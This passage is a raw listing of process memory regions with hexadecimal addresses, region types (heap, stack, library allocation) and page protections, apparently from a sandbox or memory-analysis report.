page read and write
21F12E17000
trusted library allocation
page read and write
21F0F620000
heap
page read and write
2898B6BD000
trusted library allocation
page read and write
21F12D61000
trusted library allocation
page read and write
1E45A4FD000
trusted library allocation
page read and write
21F2A105000
heap
page read and write
5726F3C000
stack
page read and write
1E45A4E4000
trusted library allocation
page read and write
21F0F68D000
heap
page read and write
21F12DE7000
trusted library allocation
page read and write
2898B3A7000
trusted library allocation
page read and write
1E44A1DA000
trusted library allocation
page read and write
28989710000
heap
page read and write
21F2AE09000
heap
page read and write
1B2B16AB000
trusted library allocation
page read and write
1E45A453000
trusted library allocation
page read and write
28D84F20000
heap
page read and write
1B2AF959000
heap
page read and write
2898B58F000
trusted library allocation
page read and write
1D135C10000
heap
page read and write
21F2191C000
trusted library allocation
page read and write
21F2B618000
heap
page read and write
21F12ECF000
trusted library allocation
page read and write
2898B367000
trusted library allocation
page read and write
1E459E0F000
trusted library allocation
page read and write
21F12E9B000
trusted library allocation
page read and write
1B2B14B9000
trusted library allocation
page read and write
21F12C59000
trusted library allocation
page read and write
1B2AF7C0000
heap
page read and write
1B2B173B000
trusted library allocation
page read and write
21F0F7D5000
heap
page read and write
21F2BC8B000
heap
page read and write
21F12CEB000
trusted library allocation
page read and write
2898B3AD000
trusted library allocation
page read and write
20681306000
heap
page read and write
1E44A087000
trusted library allocation
page read and write
1B2B14C5000
trusted library allocation
page read and write
1E459DF7000
trusted library allocation
page read and write
1830EBE0000
heap
page read and write
2898B701000
trusted library allocation
page read and write
20D736E0000
trusted library allocation
page read and write
57AE000
stack
page read and write
1830EC84000
heap
page read and write
21F0F760000
heap
page read and write
21F12EAB000
trusted library allocation
page read and write
14FE000
heap
page read and write
21F12CB1000
trusted library allocation
page read and write
19234EE9000
trusted library allocation
page read and write
21F12D3D000
trusted library allocation
page read and write
1E459D6A000
trusted library allocation
page read and write
21F12E83000
trusted library allocation
page read and write
23F67D5E000
heap
page read and write
21F2BEF8000
heap
page read and write
1E45B671000
trusted library allocation
page read and write
1E459D41000
trusted library allocation
page read and write
1E39F2D4000
heap
page read and write
83EB2FF000
stack
page read and write
21F12E3F000
trusted library allocation
page read and write
113F000
stack
page read and write
1E45B3FB000
trusted library allocation
page read and write
2CA1000
trusted library allocation
page read and write
1E449DB2000
trusted library allocation
page read and write
21F12F03000
trusted library allocation
page read and write
1E45B4D3000
trusted library allocation
page read and write
21F12D55000
trusted library allocation
page read and write
21F22052000
trusted library allocation
page read and write
21F12E51000
trusted library allocation
page read and write
289898B0000
trusted library allocation
page read and write
7FF848F10000
trusted library allocation
page execute and read and write
23F67D9B000
heap
page read and write
21F2BED6000
heap
page read and write
2898B330000
heap
page read and write
361ACFA000
stack
page read and write
D85000
heap
page read and write
2EC000
stack
page read and write
1ADB5081000
trusted library allocation
page read and write
32BA000
trusted library allocation
page read and write
21F12D53000
trusted library allocation
page read and write
1B2AF915000
heap
page read and write
85C0BDC000
stack
page read and write
21F12D09000
trusted library allocation
page read and write
21F2B1DE000
heap
page read and write
1D292115000
heap
page read and write
29974E80000
heap
page read and write
1ADB50C9000
trusted library allocation
page read and write
1E459E0A000
trusted library allocation
page read and write
1E448355000
heap
page read and write
1ADB50D3000
trusted library allocation
page read and write
1E44A0F4000
trusted library allocation
page read and write
361A9FE000
stack
page read and write
1E45B4BE000
trusted library allocation
page read and write
206812E7000
heap
page read and write
361B0FE000
stack
page read and write
CF9000
stack
page read and write
5760000
trusted library allocation
page read and write
20D7368C000
heap
page read and write
21F22090000
trusted library allocation
page read and write
21F12D13000
trusted library allocation
page read and write
19244B51000
trusted library allocation
page read and write
19233080000
heap
page read and write
21F2A1A7000
heap
page read and write
6C3000
heap
page read and write
21F11276000
trusted library allocation
page read and write
19232EEC000
heap
page read and write
1B2B14AB000
trusted library allocation
page read and write
1E448128000
heap
page read and write
2898B5AB000
trusted library allocation
page read and write
1E45A5C7000
trusted library allocation
page read and write
22E4000
trusted library allocation
page read and write
21F12C3D000
trusted library allocation
page read and write
7FF848FE0000
trusted library allocation
page execute and read and write
3060000
trusted library allocation
page read and write
1E4625B3000
heap
page read and write
21F12E2D000
trusted library allocation
page read and write
21F2B14B000
heap
page read and write
7FF848EAC000
trusted library allocation
page execute and read and write
21F12E33000
trusted library allocation
page read and write
21F12EC1000
trusted library allocation
page read and write
19234ECD000
trusted library allocation
page read and write
19233130000
trusted library allocation
page read and write
1E45B445000
trusted library allocation
page read and write
21F12C7B000
trusted library allocation
page read and write
1ADB53FF000
trusted library allocation
page read and write
7FF848DF4000
trusted library allocation
page read and write
2898B6B7000
trusted library allocation
page read and write
21F2B692000
heap
page read and write
21F219ED000
trusted library allocation
page read and write
21F12DA3000
trusted library allocation
page read and write
21F2BE70000
heap
page read and write
2898B6B1000
trusted library allocation
page read and write
21F12C7F000
trusted library allocation
page read and write
7FF848E10000
trusted library allocation
page read and write
85C0EFF000
stack
page read and write
21F29F52000
heap
page read and write
77787FF000
stack
page read and write
1B2B16FB000
trusted library allocation
page read and write
1E45B5D1000
trusted library allocation
page read and write
1B2AF9D2000
heap
page read and write
1E45B47C000
trusted library allocation
page read and write
2898B369000
trusted library allocation
page read and write
19234EC7000
trusted library allocation
page read and write
1E448350000
heap
page read and write
21F12CCD000
trusted library allocation
page read and write
1E462990000
heap
page read and write
1E45B463000
trusted library allocation
page read and write
23F68040000
heap
page read and write
21F2A4B6000
heap
page read and write
21F2AE00000
heap
page read and write
7FF848F30000
trusted library allocation
page execute and read and write
250000
unkown
page readonly
1ADB53E7000
trusted library allocation
page read and write
5BDD000
stack
page read and write
28989859000
heap
page read and write
21F12C75000
trusted library allocation
page read and write
21F2BA77000
heap
page read and write
21F12C31000
trusted library allocation
page read and write
1E44A308000
trusted library allocation
page read and write
1E45A465000
trusted library allocation
page read and write
2898B3BD000
trusted library allocation
page read and write
1E45A69C000
trusted library allocation
page read and write
7FF848E6C000
trusted library allocation
page execute and read and write
1830ECB1000
heap
page read and write
29974C8C000
heap
page read and write
1B2B16A9000
trusted library allocation
page read and write
7FF848DF0000
trusted library allocation
page read and write
4D61C7F000
stack
page read and write
21F2BAB9000
heap
page read and write
19457C00000
heap
page read and write
4D619CF000
stack
page read and write
1E45B4CC000
trusted library allocation
page read and write
547C000
stack
page read and write
2898B6E1000
trusted library allocation
page read and write
1ADB53ED000
trusted library allocation
page read and write
7FF848E0D000
trusted library allocation
page execute and read and write
1E45A43A000
trusted library allocation
page read and write
5A0E000
stack
page read and write
21F12E7F000
trusted library allocation
page read and write
21F2B284000
heap
page read and write
1E39F450000
trusted library allocation
page read and write
1E45ACB0000
trusted library allocation
page read and write
77789FF000
stack
page read and write
9DE000
unkown
page read and write
1ADB52DB000
trusted library allocation
page read and write
23F67F20000
heap
page read and write
1E45A010000
trusted library allocation
page read and write
FDC18FE000
unkown
page read and write
1E462771000
heap
page read and write
21F12E63000
trusted library allocation
page read and write
90EA99F000
stack
page read and write
21F29EE8000
heap
page read and write
FDC157C000
stack
page read and write
1E449ED9000
trusted library allocation
page read and write
7FF848E03000
trusted library allocation
page read and write
21F12E61000
trusted library allocation
page read and write
23F67F40000
heap
page read and write
A3F04FB000
stack
page read and write
7FF848ED6000
trusted library allocation
page execute and read and write
21F12DB3000
trusted library allocation
page read and write
21F12C49000
trusted library allocation
page read and write
FDC19FF000
stack
page read and write
7FF848FA0000
trusted library allocation
page read and write
83D000
stack
page read and write
1830EC9B000
heap
page read and write
21F2B356000
heap
page read and write
7FF848ED6000
trusted library allocation
page execute and read and write
7FF848E14000
trusted library allocation
page read and write
29974CA1000
heap
page read and write
7FF848FB9000
trusted library allocation
page read and write
1ADB353B000
heap
page read and write
D40000
trusted library allocation
page read and write
2898B3AB000
trusted library allocation
page read and write
7FF848FD0000
trusted library allocation
page execute and read and write
75B207F000
stack
page read and write
21F12D0D000
trusted library allocation
page read and write
9AF3EFE000
stack
page read and write
6FDA16E000
stack
page read and write
361B5FD000
stack
page read and write
1C8FA58A000
heap
page read and write
1D291E6A000
heap
page read and write
21F12CE7000
trusted library allocation
page read and write
289A3D70000
heap
page execute and read and write
1E4629A0000
heap
page read and write
1E449E74000
trusted library allocation
page read and write
21F12EA9000
trusted library allocation
page read and write
3E9000
stack
page read and write
1E45B457000
trusted library allocation
page read and write
1830ECB0000
heap
page read and write
2898B594000
trusted library allocation
page read and write
BB065FE000
unkown
page read and write
1ADCD800000
heap
page read and write
206814D0000
heap
page read and write
1B2B14AD000
trusted library allocation
page read and write
20947821000
heap
page read and write
289897CB000
heap
page read and write
2310E110000
heap
page read and write
21F2B7A0000
heap
page read and write
7FF848E10000
trusted library allocation
page read and write
7FF848ED6000
trusted library allocation
page execute and read and write
1E45B433000
trusted library allocation
page read and write
1B2B149D000
trusted library allocation
page read and write
217C525000
stack
page read and write
1E45A418000
trusted library allocation
page read and write
1E39F2D4000
heap
page read and write
1ADB3603000
heap
page read and write
31543FF000
stack
page read and write
4E7E000
stack
page read and write
83EB6FC000
stack
page read and write
1B2AF957000
heap
page read and write
19457E9E000
heap
page read and write
21F2B3D8000
heap
page read and write
7FF848E00000
trusted library allocation
page read and write
83EB3FE000
stack
page read and write
1E45A483000
trusted library allocation
page read and write
1C8FA8A0000
heap
page read and write
1E45B591000
trusted library allocation
page read and write
5C1F000
stack
page read and write
361A2ED000
stack
page read and write
21F111D0000
heap
page execute and read and write
21F12EDB000
trusted library allocation
page read and write
FD8E2DC000
stack
page read and write
21F2BDFC000
heap
page read and write
21F12D1D000
trusted library allocation
page read and write
7A5000
heap
page read and write
21F12E0B000
trusted library allocation
page read and write
1B2B168A000
trusted library allocation
page read and write
1E45A666000
trusted library allocation
page read and write
7FF848FD0000
trusted library allocation
page execute and read and write
21F12D49000
trusted library allocation
page read and write
7FF848FA0000
trusted library allocation
page read and write
C7D26FE000
unkown
page read and write
83EBAFE000
stack
page read and write
21F12E37000
trusted library allocation
page read and write
21F2AE95000
heap
page read and write
77782ED000
stack
page read and write
21F12C67000
trusted library allocation
page read and write
1E45A47B000
trusted library allocation
page read and write
1ADB52BF000
trusted library allocation
page read and write
FA4000
heap
page read and write
31544FE000
stack
page read and write
209477DB000
heap
page read and write
21F12E97000
trusted library allocation
page read and write
23F67D50000
heap
page read and write
1E45B67C000
trusted library allocation
page read and write
1ADB5321000
trusted library allocation
page read and write
1E45A5B1000
trusted library allocation
page read and write
306B000
trusted library allocation
page execute and read and write
7FF848E30000
trusted library allocation
page read and write
1E45A5D1000
trusted library allocation
page read and write
21F12E91000
trusted library allocation
page read and write
21F12CB7000
trusted library allocation
page read and write
21F2A8F4000
heap
page read and write
21F2AF0B000
heap
page read and write
19244B5F000
trusted library allocation
page read and write
21F219E3000
trusted library allocation
page read and write
7FF848E00000
trusted library allocation
page read and write
3619FBE000
stack
page read and write
2B9F000
stack
page read and write
1ADB5427000
trusted library allocation
page read and write
1E45B4DD000
trusted library allocation
page read and write
1E45A4EC000
trusted library allocation
page read and write
A3F01FE000
stack
page read and write
2C9F000
stack
page read and write
32AA000
trusted library allocation
page read and write
21F12D29000
trusted library allocation
page read and write
1D291E68000
heap
page read and write
158B000
heap
page read and write
1E45A504000
trusted library allocation
page read and write
7FF848E23000
trusted library allocation
page read and write
28D85030000
heap
page read and write
6EE000
heap
page read and write
21F12C77000
trusted library allocation
page read and write
7FF848F9B000
trusted library allocation
page read and write
7FF848E0D000
trusted library allocation
page execute and read and write
21F12C57000
trusted library allocation
page read and write
21F2A474000
heap
page read and write
21F12CB3000
trusted library allocation
page read and write
21F12CE5000
trusted library allocation
page read and write
21F12E6D000
trusted library allocation
page read and write
21F111E1000
trusted library allocation
page read and write
21F12E4D000
trusted library allocation
page read and write
4D70000
heap
page read and write
16AA000
trusted library allocation
page execute and read and write
A3F05FE000
stack
page read and write
21F12DD1000
trusted library allocation
page read and write
31549FA000
stack
page read and write
7FF848F99000
trusted library allocation
page read and write
21F12C87000
trusted library allocation
page read and write
AD56EFF000
stack
page read and write
21F0F945000
heap
page read and write
1B2B1441000
trusted library allocation
page read and write
19233215000
heap
page read and write
1E449B60000
heap
page execute and read and write
7FF4C70D0000
trusted library allocation
page execute and read and write
57273FF000
stack
page read and write
2898B6DB000
trusted library allocation
page read and write
1B2C9CE0000
heap
page read and write
29974C91000
heap
page read and write
6F8000
heap
page read and write
1ADB5097000
trusted library allocation
page read and write
2068130A000
heap
page read and write
21F29DFC000
heap
page read and write
28989790000
heap
page read and write
2899B341000
trusted library allocation
page read and write
21F12DEF000
trusted library allocation
page read and write
21F111E8000
trusted library allocation
page read and write
1E4624B0000
heap
page execute and read and write
7FF848DF3000
trusted library allocation
page execute and read and write
206814E0000
heap
page read and write
1E39F291000
heap
page read and write
2898B696000
trusted library allocation
page read and write
194699C1000
trusted library allocation
page read and write
21F12D21000
trusted library allocation
page read and write
4FBE000
stack
page read and write
21F12CA7000
trusted library allocation
page read and write
21F12C37000
trusted library allocation
page read and write
21F12E07000
trusted library allocation
page read and write
1E449B76000
heap
page read and write
21F12C3F000
trusted library allocation
page read and write
1ADB5411000
trusted library allocation
page read and write
7FF848FE0000
trusted library allocation
page execute and read and write
1ADB50CF000
trusted library allocation
page read and write
23F67D78000
heap
page read and write
1E449F23000
trusted library allocation
page read and write
1E4482E0000
heap
page read and write
21F12C47000
trusted library allocation
page read and write
6FDA175000
stack
page read and write
21F12D03000
trusted library allocation
page read and write
1E45B3F9000
trusted library allocation
page read and write
310E000
stack
page read and write
7FF848DFD000
trusted library allocation
page execute and read and write
1E45A691000
trusted library allocation
page read and write
1830EC86000
heap
page read and write
29974D50000
heap
page read and write
D64000
trusted library allocation
page read and write
1E45B476000
trusted library allocation
page read and write
21F21983000
trusted library allocation
page read and write
BBF000
stack
page read and write
21F12D81000
trusted library allocation
page read and write
1E449DEB000
trusted library allocation
page read and write
21F29B0B000
heap
page read and write
21F2B2C6000
heap
page read and write
361BAF9000
stack
page read and write
21F12D25000
trusted library allocation
page read and write
F77000
heap
page read and write
1E459DDB000
trusted library allocation
page read and write
236E000
stack
page read and write
7FF848EB0000
trusted library allocation
page execute and read and write
22B16210000
heap
page read and write
192333D0000
heap
page read and write
2898B34F000
trusted library allocation
page read and write
19457DAC000
heap
page read and write
83EAF8E000
stack
page read and write
19459D3D000
trusted library allocation
page read and write
1E459D5D000
trusted library allocation
page read and write
21F12D71000
trusted library allocation
page read and write
1E4628FC000
heap
page read and write
5740000
trusted library allocation
page read and write
209477F4000
heap
page read and write
21F1126B000
trusted library allocation
page read and write
90EA91F000
stack
page read and write
21F0F530000
heap
page read and write
21F2A012000
heap
page read and write
21F2A9DA000
heap
page read and write
1B2B16A3000
trusted library allocation
page read and write
1B2B17B1000
trusted library allocation
page read and write
F68000
heap
page read and write
21F2A705000
heap
page read and write
23F67DAC000
heap
page read and write
19233153000
trusted library allocation
page read and write
3154AF5000
stack
page read and write
7FF848E4C000
trusted library allocation
page execute and read and write
77783FF000
stack
page read and write
53DE000
stack
page read and write
21F12D5D000
trusted library allocation
page read and write
2D00000
heap
page read and write
21F29F9A000
heap
page read and write
1ADC5071000
trusted library allocation
page read and write
19457F90000
heap
page read and write
1E45A48E000
trusted library allocation
page read and write
20947760000
heap
page read and write
83EB5FE000
stack
page read and write
1B2AFA63000
trusted library allocation
page read and write
21F29B33000
heap
page read and write
1E45B667000
trusted library allocation
page read and write
1E45A4D7000
trusted library allocation
page read and write
94C000
stack
page read and write
1B2AF8F0000
heap
page read and write
21F12E5D000
trusted library allocation
page read and write
7FF848FB0000
trusted library allocation
page read and write
3154CFE000
stack
page read and write
23B0000
trusted library allocation
page execute and read and write
2068131B000
heap
page read and write
1E45AE47000
trusted library allocation
page read and write
361A8FF000
stack
page read and write
1E45B5A7000
trusted library allocation
page read and write
A3F0AFE000
stack
page read and write
19457E0E000
heap
page read and write
4A20000
trusted library allocation
page read and write
21F12EEB000
trusted library allocation
page read and write
21F0F740000
heap
page read and write
2898986A000
heap
page read and write
21F12DAD000
trusted library allocation
page read and write
7FF848E13000
trusted library allocation
page execute and read and write
361A4FC000
stack
page read and write
21F12D5B000
trusted library allocation
page read and write
21F12D45000
trusted library allocation
page read and write
194599B0000
heap
page execute and read and write
83EBBFE000
stack
page read and write
7FF848E00000
trusted library allocation
page read and write
21F12DFF000
trusted library allocation
page read and write
194721C2000
heap
page read and write
50FE000
stack
page read and write
21F29D10000
heap
page read and write
ECE000
stack
page read and write
21F12CFD000
trusted library allocation
page read and write
21F12DDB000
trusted library allocation
page read and write
1B2B14A5000
trusted library allocation
page read and write
1E39F280000
heap
page read and write
1E449EA8000
trusted library allocation
page read and write
21F12D57000
trusted library allocation
page read and write
21F2A5F8000
heap
page read and write
A3F0CFD000
stack
page read and write
20D735FC000
heap
page read and write
A3F0FFE000
stack
page read and write
2300000
trusted library allocation
page read and write
21F12DBB000
trusted library allocation
page read and write
1E449F43000
trusted library allocation
page read and write
21F2BBE7000
heap
page read and write
21F2B200000
heap
page read and write
19457DBE000
heap
page read and write
1B2AFB10000
heap
page execute and read and write
1E45B3F2000
trusted library allocation
page read and write
21F2A8D5000
heap
page read and write
21F29B4C000
heap
page read and write
1E449F38000
trusted library allocation
page read and write
289897B8000
heap
page read and write
6FDA19D000
stack
page read and write
20D7361F000
heap
page read and write
21F2AF1B000
heap
page read and write
7FF848DFD000
trusted library allocation
page execute and read and write
1E45B46E000
trusted library allocation
page read and write
21F2A553000
heap
page read and write
21F2A63A000
heap
page read and write
21F12C99000
trusted library allocation
page read and write
21F12CC1000
trusted library allocation
page read and write
21F12F09000
trusted library allocation
page read and write
21F12DB7000
trusted library allocation
page read and write
21F12DCB000
trusted library allocation
page read and write
2898B351000
trusted library allocation
page read and write
23F67D30000
heap
page read and write
1E39F410000
heap
page read and write
1E45A48B000
trusted library allocation
page read and write
7FF848EB0000
trusted library allocation
page execute and read and write
21F12E53000
trusted library allocation
page read and write
1ADB50F3000
trusted library allocation
page read and write
217C541000
stack
page read and write
1E45B5B1000
trusted library allocation
page read and write
1D135857000
heap
page read and write
240000
unkown
page readonly
1ADB5409000
trusted library allocation
page read and write
21F29B10000
heap
page read and write
1E462700000
heap
page read and write
A3F0DFD000
stack
page read and write
1E449D30000
heap
page read and write
1E45AC31000
trusted library allocation
page read and write
21F12CB9000
trusted library allocation
page read and write
7FF848E0D000
trusted library allocation
page execute and read and write
1ADB52D5000
trusted library allocation
page read and write
1ADB541D000
trusted library allocation
page read and write
21F12DDD000
trusted library allocation
page read and write
21F12CE1000
trusted library allocation
page read and write
1E461D40000
trusted library allocation
page read and write
21F2AA1C000
heap
page read and write
1E44A314000
trusted library allocation
page read and write
1E45B418000
trusted library allocation
page read and write
21F0F664000
heap
page read and write
21F12DD9000
trusted library allocation
page read and write
1ADB3518000
heap
page read and write
21F12EA3000
trusted library allocation
page read and write
7FF848EE6000
trusted library allocation
page execute and read and write
2310E210000
heap
page read and write
11BC000
stack
page read and write
21F12CBD000
trusted library allocation
page read and write
7FF848FB0000
trusted library allocation
page read and write
1B2B1467000
trusted library allocation
page read and write
21F12E8D000
trusted library allocation
page read and write
289A3C20000
heap
page read and write
21F12E0D000
trusted library allocation
page read and write
7FF848E03000
trusted library allocation
page read and write
9AF41FF000
stack
page read and write
21F12D8B000
trusted library allocation
page read and write
1E459DC5000
trusted library allocation
page read and write
21F12E45000
trusted library allocation
page read and write
23F67D57000
heap
page read and write
1E462796000
heap
page read and write
21F12C9B000
trusted library allocation
page read and write
7FF848ED6000
trusted library allocation
page execute and read and write
21F12CDF000
trusted library allocation
page read and write
21F22096000
trusted library allocation
page read and write
A3EFBFF000
stack
page read and write
AD56FFF000
stack
page read and write
21F12CC5000
trusted library allocation
page read and write
21F12C61000
trusted library allocation
page read and write
1ADB3470000
heap
page read and write
21F12E95000
trusted library allocation
page read and write
20D7367A000
heap
page read and write
21F12DAB000
trusted library allocation
page read and write
28989798000
heap
page read and write
31542FE000
stack
page read and write
2898B5FB000
trusted library allocation
page read and write
1E44A0BD000
trusted library allocation
page read and write
19232EB0000
heap
page read and write
21F12CDB000
trusted library allocation
page read and write
21F12D69000
trusted library allocation
page read and write
1E449B53000
trusted library allocation
page read and write
1E45AD87000
trusted library allocation
page read and write
7FF848E14000
trusted library allocation
page read and write
230B000
trusted library allocation
page execute and read and write
21F12EE3000
trusted library allocation
page read and write
1E449F61000
trusted library allocation
page read and write
1ADB509F000
trusted library allocation
page read and write
21F12E85000
trusted library allocation
page read and write
206812EE000
heap
page read and write
7FF848DFD000
trusted library allocation
page execute and read and write
21F0F662000
heap
page read and write
28989750000
heap
page read and write
2898B59F000
trusted library allocation
page read and write
21F12F11000
trusted library allocation
page read and write
2898B59B000
trusted library allocation
page read and write
1E449F01000
trusted library allocation
page read and write
9AF42FE000
stack
page read and write
21F12DA1000
trusted library allocation
page read and write
28D85000000
heap
page read and write
2310E270000
heap
page read and write
21F12D43000
trusted library allocation
page read and write
21F2A294000
heap
page read and write
7FF848F9B000
trusted library allocation
page read and write
2898B6CF000
trusted library allocation
page read and write
1ADB53F3000
trusted library allocation
page read and write
1ADB50ED000
trusted library allocation
page read and write
1E45AF51000
trusted library allocation
page read and write
21F12C35000
trusted library allocation
page read and write
1E449DE7000
trusted library allocation
page read and write
AD571FD000
stack
page read and write
7FF848F00000
trusted library allocation
page execute and read and write
1E45B467000
trusted library allocation
page read and write
21F12C6F000
trusted library allocation
page read and write
1E45B42D000
trusted library allocation
page read and write
21F12E2F000
trusted library allocation
page read and write
53DE000
stack
page read and write
1E44A0AE000
trusted library allocation
page read and write
7FF848DF2000
trusted library allocation
page read and write
20D737E5000
heap
page read and write
1E448167000
heap
page read and write
21F12ED1000
trusted library allocation
page read and write
16A7000
trusted library allocation
page execute and read and write
2898B3C3000
trusted library allocation
page read and write
1E449F65000
trusted library allocation
page read and write
7FF848FB5000
trusted library allocation
page read and write
2898B3BF000
trusted library allocation
page read and write
21F2A324000
heap
page read and write
19234B40000
heap
page execute and read and write
2898B5F1000
trusted library allocation
page read and write
21F2B62E000
heap
page read and write
21F12E9F000
trusted library allocation
page read and write
2898B6D9000
trusted library allocation
page read and write
21F12D0F000
trusted library allocation
page read and write
21F12DE9000
trusted library allocation
page read and write
1E459DEA000
trusted library allocation
page read and write
1E459DF0000
trusted library allocation
page read and write
7FF848FC0000
trusted library allocation
page read and write
289897BB000
heap
page read and write
1E45BC11000
trusted library allocation
page read and write
361AFFD000
stack
page read and write
1E44A0C3000
trusted library allocation
page read and write
1E44A2AB000
trusted library allocation
page read and write
21F12E5B000
trusted library allocation
page read and write
1ADB50EB000
trusted library allocation
page read and write
7FF848EA6000
trusted library allocation
page read and write
21F12CD1000
trusted library allocation
page read and write
1E45B5DC000
trusted library allocation
page read and write
8BE000
stack
page read and write
2320000
trusted library allocation
page read and write
1E44A0B7000
trusted library allocation
page read and write
28D8503A000
heap
page read and write
1ADB53C6000
trusted library allocation
page read and write
21F12D6B000
trusted library allocation
page read and write
21F2A056000
heap
page read and write
2501000
trusted library allocation
page read and write
81F9DFF000
stack
page read and write
21F12EF3000
trusted library allocation
page read and write
1E45B647000
trusted library allocation
page read and write
1ADB50D5000
trusted library allocation
page read and write
21F12EFF000
trusted library allocation
page read and write
361AAF9000
stack
page read and write
1E449EFF000
trusted library allocation
page read and write
7FF848DE4000
trusted library allocation
page read and write
21F2A4F8000
heap
page read and write
7778AFA000
stack
page read and write
1E45A487000
trusted library allocation
page read and write
21F29FC0000
heap
page read and write
162E000
stack
page read and write
21F2A209000
heap
page read and write
7FF848E0D000
trusted library allocation
page execute and read and write
21F12C69000
trusted library allocation
page read and write
77788FE000
stack
page read and write
21F12C5F000
trusted library allocation
page read and write
1339000
stack
page read and write
1E45B567000
trusted library allocation
page read and write
1B2AFAA0000
heap
page execute and read and write
14F0000
heap
page read and write
1ADB34E0000
trusted library allocation
page read and write
32AC000
trusted library allocation
page read and write
1E459E07000
trusted library allocation
page read and write
1B2AF8F8000
heap
page read and write
21F12C45000
trusted library allocation
page read and write
1C8FA550000
heap
page read and write
21F21AC3000
trusted library allocation
page read and write
1E45A687000
trusted library allocation
page read and write
1830ECA0000
heap
page read and write
3230000
heap
page execute and read and write
21F12C73000
trusted library allocation
page read and write
7FF848E2D000
trusted library allocation
page execute and read and write
21F2198D000
trusted library allocation
page read and write
7FF848E4C000
trusted library allocation
page execute and read and write
9AF44FE000
stack
page read and write
21F2A9FC000
heap
page read and write
1E45AE7C000
trusted library allocation
page read and write
AD56B9D000
stack
page read and write
21F12E93000
trusted library allocation
page read and write
6FDA165000
stack
page read and write
1E44A340000
trusted library allocation
page read and write
23F67D89000
heap
page read and write
7FF848E24000
trusted library allocation
page read and write
21F12E05000
trusted library allocation
page read and write
1E45A4A5000
trusted library allocation
page read and write
1650000
heap
page read and write
7FF848E00000
trusted library allocation
page read and write
1D135C15000
heap
page read and write
21F12E87000
trusted library allocation
page read and write
1B2B17DB000
trusted library allocation
page read and write
21F12DCD000
trusted library allocation
page read and write
21F12C93000
trusted library allocation
page read and write
117E000
stack
page read and write
21F2A7CB000
heap
page read and write
2898B5A5000
trusted library allocation
page read and write
3153F1D000
stack
page read and write
1E44813D000
heap
page read and write
19232EA0000
heap
page read and write
1E449EF8000
trusted library allocation
page read and write
21F12DD7000
trusted library allocation
page read and write
7FF848F10000
trusted library allocation
page execute and read and write
21F21A83000
trusted library allocation
page read and write
1ADB536D000
trusted library allocation
page read and write
1E459E31000
trusted library allocation
page read and write
21F12D6F000
trusted library allocation
page read and write
21F12D9F000
trusted library allocation
page read and write
21F2B650000
heap
page read and write
1B2AFA30000
trusted library allocation
page read and write
2898B3C5000
trusted library allocation
page read and write
21F12EEF000
trusted library allocation
page read and write
21F2956F000
heap
page read and write
29974E30000
heap
page read and write
19457B50000
unkown
page readonly
1E45A41B000
trusted library allocation
page read and write
1B2AF92C000
heap
page read and write
18BE000
stack
page read and write
1B2AFB45000
heap
page read and write
1ADB50CD000
trusted library allocation
page read and write
21F220AE000
trusted library allocation
page read and write
1924D400000
heap
page read and write
1D1357A0000
heap
page read and write
1B2B173D000
trusted library allocation
page read and write
1640000
heap
page read and write
16FE000
stack
page read and write
21F2AFDA000
heap
page read and write
1E45B547000
trusted library allocation
page read and write
1B2B144F000
trusted library allocation
page read and write
21F2B804000
heap
page read and write
7FF848E10000
trusted library allocation
page read and write
1ADB5079000
trusted library allocation
page read and write
1E449F1D000
trusted library allocation
page read and write
A3EFEFD000
stack
page read and write
20681330000
heap
page read and write
2310E275000
heap
page read and write
1B2B149F000
trusted library allocation
page read and write
1E45B4B7000
trusted library allocation
page read and write
19234BA8000
trusted library allocation
page read and write
32B4000
trusted library allocation
page read and write
21F0F940000
heap
page read and write
1ADB52CD000
trusted library allocation
page read and write
1B2B16F1000
trusted library allocation
page read and write
1ADB509D000
trusted library allocation
page read and write
D80000
heap
page read and write
1E45B587000
trusted library allocation
page read and write
1E45AD7C000
trusted library allocation
page read and write
1830EC8B000
heap
page read and write
50CB31C000
stack
page read and write
29974C8D000
heap
page read and write
21F12CD5000
trusted library allocation
page read and write
1E45B691000
trusted library allocation
page read and write
1E44A320000
trusted library allocation
page read and write
1E45B485000
trusted library allocation
page read and write
7FF848E03000
trusted library allocation
page read and write
1B2B146B000
trusted library allocation
page read and write
23F67DAB000
heap
page read and write
2898B3AF000
trusted library allocation
page read and write
1E39F2C1000
heap
page read and write
21F2C095000
heap
page read and write
123C000
stack
page read and write
1E45A477000
trusted library allocation
page read and write
21F2BE4E000
heap
page read and write
7FF848F92000
trusted library allocation
page read and write
2898B36F000
trusted library allocation
page read and write
21F12D05000
trusted library allocation
page read and write
7FF848EB0000
trusted library allocation
page execute and read and write
21F12D8F000
trusted library allocation
page read and write
192330A0000
heap
page read and write
21F2B589000
heap
page read and write
1830EBD0000
heap
page read and write
1E45A5F1000
trusted library allocation
page read and write
7FF848E9C000
trusted library allocation
page execute and read and write
20681190000
heap
page read and write
21F12CC7000
trusted library allocation
page read and write
21F12CE9000
trusted library allocation
page read and write
21F2A1C7000
heap
page read and write
21F21A18000
trusted library allocation
page read and write
4D1E000
stack
page read and write
3110000
heap
page read and write
21F12C91000
trusted library allocation
page read and write
7FF848DF0000
trusted library allocation
page read and write
21F12EFD000
trusted library allocation
page read and write
9AF40FE000
stack
page read and write
A3EF78F000
stack
page read and write
21F12E8B000
trusted library allocation
page read and write
21F12E21000
trusted library allocation
page read and write
21F22074000
trusted library allocation
page read and write
7FF848EBC000
trusted library allocation
page execute and read and write
21F2A2E1000
heap
page read and write
21F2A2C2000
heap
page read and write
21F12EB5000
trusted library allocation
page read and write
21F2BA03000
heap
page read and write
A3F02F2000
stack
page read and write
1ADB3450000
heap
page read and write
2898B59D000
trusted library allocation
page read and write
21F2A0CF000
heap
page read and write
2898B6ED000
trusted library allocation
page read and write
361ABFD000
stack
page read and write
22B163E0000
heap
page read and write
1E44A08F000
trusted library allocation
page read and write
7FF848FB0000
trusted library allocation
page read and write
1E449F25000
trusted library allocation
page read and write
7FF848F20000
trusted library allocation
page execute and read and write
87A000
stack
page read and write
21F12C39000
trusted library allocation
page read and write
1E449F67000
trusted library allocation
page read and write
1E45A567000
trusted library allocation
page read and write
1ADB3350000
heap
page read and write
23F67DAB000
heap
page read and write
19457DE2000
heap
page read and write
21F219C3000
trusted library allocation
page read and write
21F12F0F000
trusted library allocation
page read and write
1B2B17C3000
trusted library allocation
page read and write
22B16365000
heap
page read and write
1E449F1F000
trusted library allocation
page read and write
21F12DAF000
trusted library allocation
page read and write
21F21A0D000
trusted library allocation
page read and write
590C000
stack
page read and write
21F12D87000
trusted library allocation
page read and write
AD573FE000
stack
page read and write
2310E2E0000
heap
page read and write
21F12E09000
trusted library allocation
page read and write
50BE000
stack
page read and write
6FDA191000
stack
page read and write
21F12D59000
